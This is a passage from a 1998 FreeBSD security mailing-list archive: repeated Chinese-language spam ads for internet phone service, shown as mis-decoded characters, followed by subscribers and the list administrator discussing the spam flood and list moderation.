From owner-freebsd-security Sun Jun 7 20:04:37 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA12289 for freebsd-security-outgoing; Sun, 7 Jun 1998 20:04:37 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ms13.hinet.net (root@ms13.hinet.net [168.95.4.13]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA12205; Sun, 7 Jun 1998 20:04:15 -0700 (PDT) (envelope-from 627075520@ms23.hinet.net) From: 627075520@ms23.hinet.net Received: from ms13.hinet.net (a242p14.dialup.ccu.edu.tw [140.123.254.154]) by ms13.hinet.net (8.8.8/8.8.8) with SMTP id LAA24979; Mon, 8 Jun 1998 11:02:23 +0800 (CST) Date: Mon, 8 Jun 1998 11:02:23 +0800 (CST) Message-Id: <199806080302.LAA24979@ms13.hinet.net> Subject: 142503168¸`¬Ù°ê¤º,°ê»Úªø³~¹q¸Ü¡D¡D¡D¡D¸`¬Ù°ê¤º,°ê»Úªø³~¹q¸Ü¡D To: undisclosed-recipients:; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ¸`¬Ù°ê¤º,°ê¥´ÂZ¦U¦ì, ¦b³o»q¥ý©êºp¤F...¦pªG¦³ªB¤Í¤£§Æ±æ¦¬¨ì¼s§i«H, ½Ð¨Ó«H, ·|§â§Aªº±b¸¹µ¹§R°£, ¥H§K¥´Àu¨ì§A ±`¥´°ê¤º¡B°ê»Úªø³~¹q¸ÜªºªB¤Í¦³ºÖ¤F, ¥i¥HÀ°§A¸`¬Ù¹q¸Ü¶Oªº¬ì§Þ²£«~¥X²{¤F, ºô¸ô¹q¸Ü,¤@ºØ¤£»Ý­n¤Wºô¸ô´N¥i¸g¥Ñºô¸ô©M»·¤èªºªB¤Í³q¸Ü,¦Ó¥B¬O¯u¥¿(¹q¸Ü¹ï ¹q¸Ü) ³yºÖ¤£·|¨Ï¥Î¹q¸£ªºªB¤Í­Ì³á!­«ÂI¬O®ÄªG¯uªº¤£¿ù. °ê¤ºªø³~¹q¸Ü¶O¥i¥H ¸`¬Ù50%;°ê»Úªø³~¹q¸Ü¶O¥i¥H¸`¬Ù30-60%.¦Ó¥B¦¹¨t²Î¤£»Ý¦w¸Ë¨ä¥L³]³Æ, ¨Ï¥Î¤@ ¯ë¹q¸Ü§Y¥i. ¥Ø«e¥¿¦b´M§ä¹w¥I¥d¸g¾P, ¦³¿³½ìªB¤Í½Ð°Ñ¦Ò¬Ý¬Ý. http://399.kingnet.com.tw/~jenq e-mail: jenq001@ms4.hinet.net Tel: 0931922113 BBC: 0959878795#88§ä¾Gµ¾¤¸ ºô¸ô¦æ¾PÅU°Ý TEL:0935-266804 ¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sun Jun 7 20:05:41 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA12559 for freebsd-security-outgoing; Sun, 7 Jun 1998 20:05:41 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ms3.hinet.net (root@ms3.hinet.net [168.95.4.30]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA12470; Sun, 7 Jun 1998 20:05:15 -0700 (PDT) (envelope-from 324481088@ms23.hinet.net) From: 324481088@ms23.hinet.net Received: from ms3.hinet.net (a242p14.dialup.ccu.edu.tw [140.123.254.154]) by ms3.hinet.net (8.8.8/8.8.8) with SMTP id LAA28663; Mon, 8 Jun 1998 11:04:12 +0800 (CST) Date: Mon, 8 Jun 1998 11:04:12 +0800 (CST) Message-Id: <199806080304.LAA28663@ms3.hinet.net> Subject: 32298368¸`¬Ù°ê¤º,°ê»Úªø³~¹q¸Ü¡D¡D¸`¬Ù°ê¤º,°ê»Úªø³~¹q¸Ü¡D¡D¡D¡D¡D¡D¡D¡D To: undisclosed-recipients:; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ¸`¬Ù°ê¤º,°ê¥´ÂZ¦U¦ì, ¦b³o»q¥ý©êºp¤F...¦pªG¦³ªB¤Í¤£§Æ±æ¦¬¨ì¼s§i«H, ½Ð¨Ó«H, ·|§â§Aªº±b¸¹µ¹§R°£, ¥H§K¥´Àu¨ì§A ±`¥´°ê¤º¡B°ê»Úªø³~¹q¸ÜªºªB¤Í¦³ºÖ¤F, ¥i¥HÀ°§A¸`¬Ù¹q¸Ü¶Oªº¬ì§Þ²£«~¥X²{¤F, ºô¸ô¹q¸Ü,¤@ºØ¤£»Ý­n¤Wºô¸ô´N¥i¸g¥Ñºô¸ô©M»·¤èªºªB¤Í³q¸Ü,¦Ó¥B¬O¯u¥¿(¹q¸Ü¹ï ¹q¸Ü) ³yºÖ¤£·|¨Ï¥Î¹q¸£ªºªB¤Í­Ì³á!­«ÂI¬O®ÄªG¯uªº¤£¿ù. °ê¤ºªø³~¹q¸Ü¶O¥i¥H ¸`¬Ù50%;°ê»Úªø³~¹q¸Ü¶O¥i¥H¸`¬Ù30-60%.¦Ó¥B¦¹¨t²Î¤£»Ý¦w¸Ë¨ä¥L³]³Æ, ¨Ï¥Î¤@ ¯ë¹q¸Ü§Y¥i. ¥Ø«e¥¿¦b´M§ä¹w¥I¥d¸g¾P, ¦³¿³½ìªB¤Í½Ð°Ñ¦Ò¬Ý¬Ý. http://399.kingnet.com.tw/~jenq e-mail: jenq001@ms4.hinet.net Tel: 0931922113 BBC: 0959878795#88§ä¾Gµ¾¤¸ ºô¸ô¦æ¾PÅU°Ý TEL:0935-266804 ¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sun Jun 7 20:06:38 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA12754 for freebsd-security-outgoing; Sun, 7 Jun 1998 20:06:38 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ms16.hinet.net (root@ms16.hinet.net [168.95.4.16]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA12663; Sun, 7 Jun 1998 20:06:08 -0700 (PDT) (envelope-from 917055808@ms23.hinet.net) From: 917055808@ms23.hinet.net Received: from ms16.hinet.net (a242p14.dialup.ccu.edu.tw [140.123.254.154]) by ms16.hinet.net (8.8.8/8.8.8) with SMTP id LAA03738; Mon, 8 Jun 1998 11:10:30 +0800 (CST) Date: Mon, 8 Jun 1998 11:10:30 +0800 (CST) Message-Id: <199806080310.LAA03738@ms16.hinet.net> Subject: 768443008¸`¬Ù°ê¤º,°ê»Úªø³~¹q¸Ü¸`¬Ù°ê¤º,°ê»Úªø³~¹q¸Ü¡D¡D¡D¡D¡D To: undisclosed-recipients:; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ¸`¬Ù°ê¤º,°ê¥´ÂZ¦U¦ì, ¦b³o»q¥ý©êºp¤F...¦pªG¦³ªB¤Í¤£§Æ±æ¦¬¨ì¼s§i«H, ½Ð¨Ó«H, ·|§â§Aªº±b¸¹µ¹§R°£, ¥H§K¥´Àu¨ì§A ±`¥´°ê¤º¡B°ê»Úªø³~¹q¸ÜªºªB¤Í¦³ºÖ¤F, ¥i¥HÀ°§A¸`¬Ù¹q¸Ü¶Oªº¬ì§Þ²£«~¥X²{¤F, ºô¸ô¹q¸Ü,¤@ºØ¤£»Ý­n¤Wºô¸ô´N¥i¸g¥Ñºô¸ô©M»·¤èªºªB¤Í³q¸Ü,¦Ó¥B¬O¯u¥¿(¹q¸Ü¹ï ¹q¸Ü) ³yºÖ¤£·|¨Ï¥Î¹q¸£ªºªB¤Í­Ì³á!­«ÂI¬O®ÄªG¯uªº¤£¿ù. °ê¤ºªø³~¹q¸Ü¶O¥i¥H ¸`¬Ù50%;°ê»Úªø³~¹q¸Ü¶O¥i¥H¸`¬Ù30-60%.¦Ó¥B¦¹¨t²Î¤£»Ý¦w¸Ë¨ä¥L³]³Æ, ¨Ï¥Î¤@ ¯ë¹q¸Ü§Y¥i. ¥Ø«e¥¿¦b´M§ä¹w¥I¥d¸g¾P, ¦³¿³½ìªB¤Í½Ð°Ñ¦Ò¬Ý¬Ý. http://399.kingnet.com.tw/~jenq e-mail: jenq001@ms4.hinet.net Tel: 0931922113 BBC: 0959878795#88§ä¾Gµ¾¤¸ ºô¸ô¦æ¾PÅU°Ý TEL:0935-266804 ¡D¡D¡D¡D To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sun Jun 7 20:06:49 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA12803 for freebsd-security-outgoing; Sun, 7 Jun 1998 20:06:49 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ms8.hinet.net (root@ms8.hinet.net [168.95.4.80]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA12717; Sun, 7 Jun 1998 20:06:25 -0700 (PDT) (envelope-from 155925184@ms23.hinet.net) From: 155925184@ms23.hinet.net Received: from ms8.hinet.net (a242p14.dialup.ccu.edu.tw [140.123.254.154]) by ms8.hinet.net (8.8.8/8.8.8) with SMTP id LAA18235; Mon, 8 Jun 1998 11:07:41 +0800 (CST) Date: Mon, 8 Jun 1998 11:07:41 +0800 (CST) Message-Id: <199806080307.LAA18235@ms8.hinet.net> Subject: 7787008¸`¬Ù°ê¤º,°ê»Úªø³~¹q¸Ü¡D¡D¡D¡D¡D¸`¬Ù°ê¤º,°ê»Úªø³~¹q¸Ü¡D¡D To: undisclosed-recipients:; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ¸`¬Ù°ê¤º,°ê¥´ÂZ¦U¦ì, ¦b³o»q¥ý©êºp¤F...¦pªG¦³ªB¤Í¤£§Æ±æ¦¬¨ì¼s§i«H, ½Ð¨Ó«H, ·|§â§Aªº±b¸¹µ¹§R°£, ¥H§K¥´Àu¨ì§A ±`¥´°ê¤º¡B°ê»Úªø³~¹q¸ÜªºªB¤Í¦³ºÖ¤F, ¥i¥HÀ°§A¸`¬Ù¹q¸Ü¶Oªº¬ì§Þ²£«~¥X²{¤F, ºô¸ô¹q¸Ü,¤@ºØ¤£»Ý­n¤Wºô¸ô´N¥i¸g¥Ñºô¸ô©M»·¤èªºªB¤Í³q¸Ü,¦Ó¥B¬O¯u¥¿(¹q¸Ü¹ï ¹q¸Ü) ³yºÖ¤£·|¨Ï¥Î¹q¸£ªºªB¤Í­Ì³á!­«ÂI¬O®ÄªG¯uªº¤£¿ù. °ê¤ºªø³~¹q¸Ü¶O¥i¥H ¸`¬Ù50%;°ê»Úªø³~¹q¸Ü¶O¥i¥H¸`¬Ù30-60%.¦Ó¥B¦¹¨t²Î¤£»Ý¦w¸Ë¨ä¥L³]³Æ, ¨Ï¥Î¤@ ¯ë¹q¸Ü§Y¥i. ¥Ø«e¥¿¦b´M§ä¹w¥I¥d¸g¾P, ¦³¿³½ìªB¤Í½Ð°Ñ¦Ò¬Ý¬Ý. http://399.kingnet.com.tw/~jenq e-mail: jenq001@ms4.hinet.net Tel: 0931922113 BBC: 0959878795#88§ä¾Gµ¾¤¸ ºô¸ô¦æ¾PÅU°Ý TEL:0935-266804 ¡D¡D¡D¡D To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sun Jun 7 20:06:52 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA12813 for freebsd-security-outgoing; Sun, 7 Jun 1998 20:06:52 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ms14.hinet.net (root@ms14.hinet.net [168.95.4.14]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA12731; Sun, 7 Jun 1998 20:06:29 -0700 (PDT) (envelope-from 115776448@ms23.hinet.net) From: 115776448@ms23.hinet.net Received: from ms14.hinet.net (a242p14.dialup.ccu.edu.tw [140.123.254.154]) by ms14.hinet.net (8.8.8/8.8.8) with SMTP id LAA03696; Mon, 8 Jun 1998 11:04:36 +0800 (CST) Date: Mon, 8 Jun 1998 11:04:36 +0800 (CST) Message-Id: <199806080304.LAA03696@ms14.hinet.net> Subject: 463406848¸`¬Ù°ê¤º,°ê»Úªø³~¹q¸Ü¡D¸`¬Ù°ê¤º,°ê»Úªø³~¹q¸Ü¡D¡D¡D¡D¡D¡D¡D¡D¡D To: undisclosed-recipients:; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ¸`¬Ù°ê¤º,°ê¥´ÂZ¦U¦ì, ¦b³o»q¥ý©êºp¤F...¦pªG¦³ªB¤Í¤£§Æ±æ¦¬¨ì¼s§i«H, ½Ð¨Ó«H, ·|§â§Aªº±b¸¹µ¹§R°£, ¥H§K¥´Àu¨ì§A ±`¥´°ê¤º¡B°ê»Úªø³~¹q¸ÜªºªB¤Í¦³ºÖ¤F, ¥i¥HÀ°§A¸`¬Ù¹q¸Ü¶Oªº¬ì§Þ²£«~¥X²{¤F, ºô¸ô¹q¸Ü,¤@ºØ¤£»Ý­n¤Wºô¸ô´N¥i¸g¥Ñºô¸ô©M»·¤èªºªB¤Í³q¸Ü,¦Ó¥B¬O¯u¥¿(¹q¸Ü¹ï ¹q¸Ü) ³yºÖ¤£·|¨Ï¥Î¹q¸£ªºªB¤Í­Ì³á!­«ÂI¬O®ÄªG¯uªº¤£¿ù. °ê¤ºªø³~¹q¸Ü¶O¥i¥H ¸`¬Ù50%;°ê»Úªø³~¹q¸Ü¶O¥i¥H¸`¬Ù30-60%.¦Ó¥B¦¹¨t²Î¤£»Ý¦w¸Ë¨ä¥L³]³Æ, ¨Ï¥Î¤@ ¯ë¹q¸Ü§Y¥i. ¥Ø«e¥¿¦b´M§ä¹w¥I¥d¸g¾P, ¦³¿³½ìªB¤Í½Ð°Ñ¦Ò¬Ý¬Ý. http://399.kingnet.com.tw/~jenq e-mail: jenq001@ms4.hinet.net Tel: 0931922113 BBC: 0959878795#88§ä¾Gµ¾¤¸ ºô¸ô¦æ¾PÅU°Ý TEL:0935-266804 ¡D¡D¡D¡D¡D¡D¡D¡D¡D¡D To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sun Jun 7 20:07:52 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA13042 for freebsd-security-outgoing; Sun, 7 Jun 1998 20:07:52 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ms8.hinet.net (root@ms8.hinet.net [168.95.4.80]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA12945; Sun, 7 Jun 1998 20:07:19 -0700 (PDT) (envelope-from 627716672@ms23.hinet.net) From: 627716672@ms23.hinet.net Received: from ms8.hinet.net (a242p14.dialup.ccu.edu.tw [140.123.254.154]) by ms8.hinet.net (8.8.8/8.8.8) with SMTP id LAA18384; Mon, 8 Jun 1998 11:09:07 +0800 (CST) Date: Mon, 8 Jun 1998 11:09:07 +0800 (CST) Message-Id: <199806080309.LAA18384@ms8.hinet.net> Subject: 933134208¸`¬Ù°ê¤º,°ê»Úªø³~¹q¸Ü¡D¡D¡D¡D¸`¬Ù°ê¤º,°ê»Úªø³~¹q¸Ü¡D¡D¡D To: undisclosed-recipients:; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ¸`¬Ù°ê¤º,°ê¥´ÂZ¦U¦ì, ¦b³o»q¥ý©êºp¤F...¦pªG¦³ªB¤Í¤£§Æ±æ¦¬¨ì¼s§i«H, ½Ð¨Ó«H, ·|§â§Aªº±b¸¹µ¹§R°£, ¥H§K¥´Àu¨ì§A ±`¥´°ê¤º¡B°ê»Úªø³~¹q¸ÜªºªB¤Í¦³ºÖ¤F, ¥i¥HÀ°§A¸`¬Ù¹q¸Ü¶Oªº¬ì§Þ²£«~¥X²{¤F, ºô¸ô¹q¸Ü,¤@ºØ¤£»Ý­n¤Wºô¸ô´N¥i¸g¥Ñºô¸ô©M»·¤èªºªB¤Í³q¸Ü,¦Ó¥B¬O¯u¥¿(¹q¸Ü¹ï ¹q¸Ü) ³yºÖ¤£·|¨Ï¥Î¹q¸£ªºªB¤Í­Ì³á!­«ÂI¬O®ÄªG¯uªº¤£¿ù. °ê¤ºªø³~¹q¸Ü¶O¥i¥H ¸`¬Ù50%;°ê»Úªø³~¹q¸Ü¶O¥i¥H¸`¬Ù30-60%.¦Ó¥B¦¹¨t²Î¤£»Ý¦w¸Ë¨ä¥L³]³Æ, ¨Ï¥Î¤@ ¯ë¹q¸Ü§Y¥i. ¥Ø«e¥¿¦b´M§ä¹w¥I¥d¸g¾P, ¦³¿³½ìªB¤Í½Ð°Ñ¦Ò¬Ý¬Ý. http://399.kingnet.com.tw/~jenq e-mail: jenq001@ms4.hinet.net Tel: 0931922113 BBC: 0959878795#88§ä¾Gµ¾¤¸ ºô¸ô¦æ¾PÅU°Ý TEL:0935-266804 ¡D¡D¡D¡D¡D¡D¡D¡D To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon Jun 8 08:22:46 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA01292 for freebsd-security-outgoing; Mon, 8 Jun 1998 08:22:46 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from bofh.shmooze.net (markjr@bofh.shmOOze.net [205.210.42.6]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA01271 for ; Mon, 8 Jun 1998 08:22:38 -0700 (PDT) (envelope-from markjr@bofh.shmooze.net) Received: (from markjr@localhost) by bofh.shmooze.net (8.8.5/8.8.3) id LAA04936 for freebsd-security@freebsd.org; Mon, 8 Jun 1998 11:22:31 -0400 Message-ID: X-Mailer: XFMail 1.3-beta-042198 [p0] on Linux X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 Date: Mon, 08 Jun 1998 11:22:31 -0400 (EDT) Reply-To: Stunt Pope Organization: Private World Communications From: Stunt Pope To: freebsd-security@FreeBSD.ORG Subject: wtf? Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I've got about 60 messages this morning from addresses like: 155925184@ms23.hinet.net and subjects: 7787008^ø`^ì^?^ð^*^ä^ú,^ð I'd say it was an alternate char set or something? But the fact that the gibberesh in from and subj. changes each time makes it almost look like a mailbomb. All of them got sucked in by my spam filter, but I'm curious as to what's going on here. Maybe the lists outbound should be spam filtered with the list owner periodically checking the bit-bucket for false-positives? Just a thought. -mark --- Mark Jeftovic aka: mark jeff or vic, stunt pope. markjr@shmOOze.net http://www.shmOOze.net/~markjr Private World's BOFH http://www.PrivateWorld.com irc: L-bOMb Keep `em Guessing To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon Jun 8 09:09:37 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA09061 for freebsd-security-outgoing; Mon, 8 Jun 1998 09:09:37 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from access.sanet.ge (access.sanet.ge [208.239.39.51]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA08931 for ; Mon, 8 Jun 1998 09:08:20 -0700 (PDT) (envelope-from stealth@sanet.ge) Received: from localhost (stealth@localhost) by access.sanet.ge (8.8.8/8.8.7) with SMTP id UAA11566; Mon, 8 Jun 1998 20:06:33 +0500 (GET) (envelope-from stealth@sanet.ge) X-Authentication-Warning: access.sanet.ge: stealth owned process doing -bs Date: Mon, 8 Jun 1998 20:06:33 +0500 (GET) From: Alexander Kandelaki To: Stunt Pope cc: freebsd-security@FreeBSD.ORG Subject: Re: wtf? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from QUOTED-PRINTABLE to 8bit by hub.freebsd.org id JAA08938 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I got the same :( 1 question does this list moderated ??? On Mon, 8 Jun 1998, Stunt Pope wrote: > I've got about 60 messages this morning from addresses like: > > 155925184@ms23.hinet.net > > and subjects: 7787008^ø`^ì^?^ð^*^ä^ú,^ð > > I'd say it was an alternate char set or something? But the fact that > the gibberesh in from and subj. changes each time makes it almost look > like a mailbomb. > > All of them got sucked in by my spam filter, but I'm curious as to what's > going on here. > > Maybe the lists outbound should be spam filtered with the list owner > periodically checking the bit-bucket for false-positives? Just a thought. > > -mark > > --- > Mark Jeftovic aka: mark jeff or vic, stunt pope. > markjr@shmOOze.net http://www.shmOOze.net/~markjr > Private World's BOFH http://www.PrivateWorld.com > irc: L-bOMb Keep `em Guessing > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon Jun 8 09:38:46 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA16868 for freebsd-security-outgoing; Mon, 8 Jun 1998 09:38:46 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from homer.bethel.edu (homer.acs.bethel.edu [140.88.128.6]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA16730 for ; Mon, 8 Jun 1998 09:38:25 -0700 (PDT) (envelope-from bparks@homer.acs.bethel.edu) Received: from turing (turing.acs.bethel.edu [140.88.5.23]) by homer.bethel.edu (8.9.0/8.9.0) with SMTP id LAA18343; Mon, 8 Jun 1998 11:38:04 -0500 (CDT) Received: by turing (NX5.67e) id AA01444; Mon, 8 Jun 98 11:38:02 -0500 Message-Id: <9806081638.AA01444@turing> Content-Type: text/plain Mime-Version: 1.0 (NeXT Mail 3.3 v118.2) Received: by NeXT.Mailer (1.118.2) From: "Brad G. Parks" Date: Mon, 8 Jun 98 11:38:00 -0500 To: Stunt Pope Subject: Re: wtf? Cc: freebsd-security@FreeBSD.ORG References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Considering that the originating domain (hinet.net) has a registered address in Taiwan, I would guess those messages were legitimate questions -- just not using the 26 letters that my mail program and I are used to seeing. -brad To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon Jun 8 09:42:38 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA18098 for freebsd-security-outgoing; Mon, 8 Jun 1998 09:42:38 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns1.seidata.com (ns1.seidata.com [208.10.211.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA18023 for ; Mon, 8 Jun 1998 09:42:25 -0700 (PDT) (envelope-from mike@seidata.com) Received: from localhost (mike@localhost) by ns1.seidata.com (8.8.8/8.8.5) with SMTP id MAA17270; Mon, 8 Jun 1998 12:42:25 -0400 (EDT) Date: Mon, 8 Jun 1998 12:42:25 -0400 (EDT) From: Mike To: Stunt Pope cc: freebsd-security@FreeBSD.ORG Subject: Re: wtf? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from QUOTED-PRINTABLE to 8bit by hub.freebsd.org id JAA18049 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 8 Jun 1998, Stunt Pope wrote: > I've got about 60 messages this morning from addresses like: > 155925184@ms23.hinet.net > and subjects: 7787008^ø`^ì^?^ð^*^ä^ú,^ð [snip] FYI... Ditto. ;) -mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon Jun 8 09:55:45 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA21354 for freebsd-security-outgoing; Mon, 8 Jun 1998 09:55:45 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from bofh.shmooze.net (markjr@bofh.shmOOze.net [205.210.42.6]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA21304 for ; Mon, 8 Jun 1998 09:55:05 -0700 (PDT) (envelope-from markjr@bofh.shmooze.net) Received: (from markjr@localhost) by bofh.shmooze.net (8.8.5/8.8.3) id MAA05102; Mon, 8 Jun 1998 12:53:57 -0400 Message-ID: X-Mailer: XFMail 1.3-beta-042198 [p0] on Linux X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <9806081638.AA01444@turing> Date: Mon, 08 Jun 1998 12:53:57 -0400 (EDT) Reply-To: Stunt Pope Organization: Private World Communications From: Stunt Pope To: "Brad G. Parks" Subject: Re: wtf? Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 08-Jun-98 Brad G. Parks wrote: > Considering that the originating domain (hinet.net) > has a registered address in Taiwan, I would guess > those messages were legitimate questions -- just > not using the 26 letters that my mail program and > I are used to seeing. > > -brad That would explain why the subject lines keep changing, but the numeric From: addresses, also changing each time, makes me wonder. (And yet the same email address and web site are cited at the bottom of each email, so maybe that's the case,) -mark --- Mark Jeftovic aka: mark jeff or vic, stunt pope. markjr@shmOOze.net http://www.shmOOze.net/~markjr Private World's BOFH http://www.PrivateWorld.com irc: L-bOMb Keep `em Guessing To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon Jun 8 10:19:57 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA26031 for freebsd-security-outgoing; Mon, 8 Jun 1998 10:19:57 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: (from jmb@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA25953; Mon, 8 Jun 1998 10:19:24 -0700 (PDT) (envelope-from jmb) From: "Jonathan M. Bresler" Message-Id: <199806081719.KAA25953@hub.freebsd.org> Subject: Re: wtf? In-Reply-To: from Alexander Kandelaki at "Jun 8, 98 08:06:33 pm" To: stealth@sanet.ge (Alexander Kandelaki) Date: Mon, 8 Jun 1998 10:19:23 -0700 (PDT) Cc: markjr@shmOOze.net, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL32 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Alexander Kandelaki wrote: > > I got the same :( > 1 question does this list moderated ??? no. only freebsd-announce and freebsd-security-notifications are moderated. i have neither the time nor the desire to moderate the 40+m mailing lists. i have send mail to the responsible parties at hinet.net. if it comes to it, we will block all emamil from hinet.net. jmb To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon Jun 8 23:32:40 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA12128 for freebsd-security-outgoing; Mon, 8 Jun 1998 23:32:40 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from proxy.unpar.ac.id (proxy.unpar.ac.id [167.205.206.55]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA12027 for ; Mon, 8 Jun 1998 23:32:03 -0700 (PDT) (envelope-from 4196086@student.unpar.ac.id) Received: from student.unpar.ac.id (210student.unpar.ac.id [10.210.1.3]) by proxy.unpar.ac.id (8.8.5/8.8.5) with ESMTP id NAA17565 for ; Tue, 9 Jun 1998 13:13:26 +0700 (JAVT) Received: from localhost (4196086@localhost) by student.unpar.ac.id (8.8.5/8.8.5.D) with SMTP id NAA06083 for ; Tue, 9 Jun 1998 13:35:29 +0700 (JAVT) Date: Tue, 9 Jun 1998 13:35:28 +0700 (JAVT) From: Kok Beng <4196086@student.unpar.ac.id> To: freebsd-security@FreeBSD.ORG Subject: subscribe Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org subscribe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Tue Jun 9 09:20:53 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA02415 for freebsd-security-outgoing; Tue, 9 Jun 1998 09:20:53 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from uriela.in-berlin.de (uriela.in-berlin.de [192.109.42.147]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id JAA02106 for ; Tue, 9 Jun 1998 09:19:52 -0700 (PDT) (envelope-from nortobor.nostromo.in-berlin.de!ripley@never.mind.de) Received: by uriela.in-berlin.de (/\oo/\ Smail3.1.29.1 #29.8) from never.never.mind.de 